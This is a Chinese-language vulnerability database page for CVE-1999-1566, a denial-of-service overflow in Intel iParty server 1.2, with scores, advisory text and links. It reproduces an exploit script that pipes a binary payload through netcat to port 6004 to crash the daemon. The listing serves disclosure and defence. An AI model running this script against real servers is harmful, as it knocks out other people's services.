CVE-1999-1566
CVSS5.0
发布时间 :1999-05-08 00:00:00
修订时间 :2008-09-05 16:19:49
NMCOES    

[原文]Buffer overflow in iParty server 1.2 and earlier allows remote attackers to cause a denial of service (crash) by connecting to default port 6004 and sending repeated extended characters.


[CNNVD]iParty Conferencing Server远程拒绝服务攻击漏洞(CNNVD-199905-021)

        
        iParty是一款由Intel Experimental Technologies Department公司开发的小型语音会议交谈程序。
        iParty会议服务守护程序没有正确处理用户提交的畸形请求,远程攻击者可以利用这个漏洞对会议服务系统进行拒绝服务攻击。
        攻击者可以发送大量字符到会议服务进程守护的6004端口,可导致服务程序崩溃,停止对正常请求的响应。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1566
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-1566
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199905-021
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/archive/1/13600
(VENDOR_ADVISORY)  BUGTRAQ  19990508 iParty Daemon Vulnerability w/ Exploit Code (worse than thought?)

- 漏洞信息

iParty Conferencing Server远程拒绝服务攻击漏洞
中危 边界条件错误
1999-05-08 00:00:00 2005-10-20 00:00:00
远程  
        
        iParty是一款由Intel Experimental Technologies Department公司开发的小型语音会议交谈程序。
        iParty会议服务守护程序没有正确处理用户提交的畸形请求,远程攻击者可以利用这个漏洞对会议服务系统进行拒绝服务攻击。
        攻击者可以发送大量字符到会议服务进程守护的6004端口,可导致服务程序崩溃,停止对正常请求的响应。
        

- 公告与补丁

        厂商补丁:
        Intel Corporation
        -----------------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.intel.com

- 漏洞信息 (22250)

iParty Conferencing Server Denial Of Service Vulnerability (EDBID:22250)
multiple dos
1999-05-08 Verified
0 wh00t
N/A [点击下载]
source: http://www.securityfocus.com/bid/6844/info

A buffer overflow condition has been discovered in the Intel iParty server.

It is possible to trigger a denial of service by submitting an excessive number of characters to the network port used by the iParty server. The server will need to be restarted to regain normal functionality.

This issue may be due to a buffer overrun, potentially resulting in arbitrary code execution. This possibility has not been confirmed. 

#!/bin/sh
# iParty Pooper by Ka-wh00t (wh00t@iname.com) - early May '99 - Created out of pure boredom.
# iParty is a cute little voice conferencing program still widely used (much to my surprise.)
# Unfortuneately, the daemon, that's included in the iParty download, can be shut down remotely.
# And in some circumstances, this can lead to other Windows screw-ups (incidents included internet
# disconnection, ICQ GPFs, Rnaapp crashes, etc.) Sometimes the daemon closes quietly, other
times
# a ipartyd.exe GPF. DoSers will hope for the GPF. At time of this script's release, the latest
# (only?) version of iParty/iPartyd was v1.2
# FOR EDUCATIONAL PURPOSES ONLY.


if [ "$1" = "" ]; then
echo "Simple Script by Ka-wh00t to kill any iParty Server v1.2 and under. (ipartyd.exe)"
echo "In some circumstances can also crash other Windows progs and maybe even Windows itself."
echo "Maybe you'll get lucky."
echo ""
echo "Usage: $0 <hostname/ip> <port>"
echo "Port is probably 6004 (default port)."
echo ""
echo "Remember: You need netcat for this program to work."
echo "If you see something similar to 'nc: command not found', get netcat."
else
if [ "$2" = "" ]; then
echo "I said the port is probably 6004, try that."
exit
else
rm -f ipp00p
cat > ipp00p << _EOF_
$6ì]}tTÕµ?"̐a?p/?HÔD?0iAáœL%ÏÌ?EBEԁð'*}ÒyÓÔ¥(3êz?nÃuèԏj+š°(Ö?Ö?d'??øZiXåËy7¡'``àŸœÏ	Cµ¶ïüÖʹçî³ÏÞçìœÏ>çܐE¢6?â^ßî^v¯?ì^¯:ÂÆ{n"uí£Ç'g=oš§?8ÂӁ'L5"ïé²±?á€žDRGÒIôlq?Y­g?»Òi?ÆiÕŸëH¹H?w?òᜲ»Ô3ðl??*oÎ#ésC9m,

_EOF_
echo ""
echo "Sending kill..."
cat ipp00p | nc $1 $2
echo "Done."
rm -f ipp00p
fi
fi		

- 漏洞信息

12653
iParty Client Extended Character Handling Remote Overflow DoS
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity, Loss of Availability

- 漏洞描述

- 时间线

1998-11-30 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

iParty Conferencing Server Denial Of Service Vulnerability
Boundary Condition Error 6844
Yes No
1999-05-08 12:00:00 2009-07-11 08:06:00
Discovery of this vulnerability has been credited to: wh00t X <bugtraq2@hotmail.com>

- 受影响的程序版本

Intel Corporation iParty Conferencing server 1.2

- 漏洞讨论

A buffer overflow condition has been discovered in the Intel iParty server.

It is possible to trigger a denial of service by submitting an excessive number of characters to the network port used by the iParty server. The server will need to be restarted to regain normal functionality.

This issue may be due to a buffer overrun, potentially resulting in arbitrary code execution. This possibility has not been confirmed.

- 漏洞利用

The following proof of concept code was suppplied by wh00t X &lt;bugtraq2@hotmail.com&gt;:

- 解决方案

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com <mailto:vuldb@securityfocus.com>.

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站